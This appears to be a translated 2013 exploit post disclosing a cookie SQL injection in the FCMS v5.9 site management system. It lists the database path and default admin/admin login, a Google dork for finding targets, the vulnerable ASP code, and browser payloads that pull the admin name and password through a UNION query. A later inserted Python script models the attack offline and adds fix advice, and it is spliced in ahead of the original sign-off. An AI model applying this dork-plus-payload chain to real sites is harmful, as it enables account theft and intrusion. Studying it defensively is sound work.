Dream Flash website management system FCMS v5.9 latest 0day vulnerability - Vulnerability Alert - Black Bar Safety Net (myhack58)

ID: MYHACK58:62201338863
Published: 2013-05-20 00:00:00
Author: x0day
Source: www.myhack58.com

Dream Flash website management system FCMS v5.9 latest 0day vulnerability

Database path: xmlEditor/database/####@@@datas.mdb

Backend login: xmleditor/login.asp, default account admin/admin

Guestbook database: guestbook/db/sywl.asp

Vulnerability type: cookie injection

Vulnerable file:

xml/text.asp

Vulnerable code:

<!--#include file="../conn.asp"-->
<%
' conn.asp filters the GET (QueryString) and POST (Form) collections, but ignores cookies
flowNo = Request("flowNo")
' Request("x") with no collection name searches QueryString, Form AND Cookies, not only GET and POST
if flowNo <> "" then
    ' any non-empty value, including one supplied in a cookie, is used directly
    set rs = server.CreateObject("ADODB.RecordSet")
    rs.Source = "select * from xmlContent where flowNo=" & flowNo
    rs.Open rs.Source, conn, 1, 1
    ' XML output: the data returned by the injected query shows up inside <title>
    Response.Write "<?xml version='1.0' encoding='utf-8'?>" & chr(13)
    Response.Write "<main>" & chr(13)
    Response.Write "<title><![CDATA["
    Response.Write rs("tx")
    Response.Write "]]></title>" & chr(13)
    Response.Write "<text><![CDATA["
    Response.Write rs("description")
    Response.Write "]]></text>" & chr(13)
    rs.Close
    Set rs = nothing
    conn.Close
    Set conn = nothing
    Response.Write "</main>"
end if
%>


Brief description: the same cookie injection also exists in new.asp in the site root, but that file is inconvenient to exploit because it performs a custom redirect to the home page. text.asp has no redirect or anything similar, so it is the easy one to use.

Search keyword (Google dork): inurl:"xmleditor/login.asp"

EXP (run in the browser's address bar while on the target site, then request xml/text.asp):

javascript:alert(document.cookie="flowNo="+escape("14 union select 1,2,3,adminname from XmlAdmin"));

javascript:alert(document.cookie="flowNo="+escape("14 union select 1,2,3,adminpwd from XmlAdmin"));

PS: note that the result of this EXP does not appear in the page body; the page looks blank. The extracted account name and password appear in the page title (the <title> element), so look carefully there.
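As an added example (not part of the original advisory or of the FCMS code), the following Python script models the whole exploit path offline: the cookie value the EXP above sets, the way classic ASP's bare Request() call falls through from QueryString and Form to Cookies, the SQL string text.asp ends up concatenating, and the extraction of the result from the <title> element of a sample response. The flowNo value 14, the sample XML response and the four-column layout implied by the payload are assumptions; nothing here contacts a server.

```python
"""Added example, not from the advisory: models the cookie injection in
xml/text.asp end to end without touching a real server."""
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Payloads taken from the advisory's EXP; "14" is an assumed existing flowNo value.
ADMIN_NAME_PAYLOAD = "14 union select 1,2,3,adminname from XmlAdmin"
ADMIN_PWD_PAYLOAD = "14 union select 1,2,3,adminpwd from XmlAdmin"

# Characters that JavaScript escape() leaves untouched besides alphanumerics.
_JS_ESCAPE_SAFE = "@*_+-./"


def js_escape(s: str) -> str:
    """Approximate JavaScript escape() for ASCII input, as the EXP uses it."""
    return urllib.parse.quote(s, safe=_JS_ESCAPE_SAFE)


def cookie_header(payload: str) -> str:
    """Cookie header the browser sends after document.cookie="flowNo="+escape(payload)."""
    return "flowNo=" + js_escape(payload)


def parse_cookie_header(header: str) -> dict:
    """Server-side view of the Cookie header: split pairs and undo %XX encoding."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            out[k] = urllib.parse.unquote(v)
    return out


def asp_request_flowno(query: dict, form: dict, cookies: dict) -> str:
    """Model Request("flowNo"): classic ASP searches QueryString, then Form, then
    Cookies. conn.asp filters only the first two, so a cookie value passes unchecked."""
    for collection in (query, form, cookies):
        if "flowNo" in collection:
            return collection["flowNo"]
    return ""


def vulnerable_sql(flow_no: str) -> str:
    """The string text.asp builds: plain concatenation into the WHERE clause."""
    return "select * from xmlContent where flowNo=" + flow_no


def extract_title(xml_body: str) -> str:
    """Pull the <title> CDATA out of the XML text.asp writes; per the advisory this
    is where the UNIONed column (adminname / adminpwd) lands."""
    root = ET.fromstring(xml_body.encode("utf-8"))
    return (root.findtext("title") or "").strip()


def safe_flow_no(value: str):
    """The check text.asp lacks: accept only an unsigned integer (what a CLng /
    IsNumeric validation would do); returns None for anything else."""
    return int(value) if re.fullmatch(r"\d+", value or "") else None


# Constructed sample response, shaped like text.asp's output after the first payload.
SAMPLE_RESPONSE = (
    "<?xml version='1.0' encoding='utf-8'?>\r\n"
    "<main>\r\n"
    "<title><![CDATA[admin]]></title>\r\n"
    "<text><![CDATA[]]></text>\r\n"
    "</main>"
)


def demo() -> dict:
    """Walk the injected value from browser cookie to SQL string to XML title."""
    hdr = cookie_header(ADMIN_NAME_PAYLOAD)
    flow_no = asp_request_flowno({}, {}, parse_cookie_header(hdr))
    return {
        "cookie": hdr,
        "sql": vulnerable_sql(flow_no),
        "title": extract_title(SAMPLE_RESPONSE),
        "validated": safe_flow_no(flow_no),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The safe_flow_no function only stands in for the missing check; the actual fix in the ASP page is to read the value from a named collection (Request.QueryString or Request.Cookies rather than the bare Request()), reject anything that is not an integer, and pass it as a bound parameter through an ADODB.Command instead of concatenating it into the SQL string.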

Off to sleep~!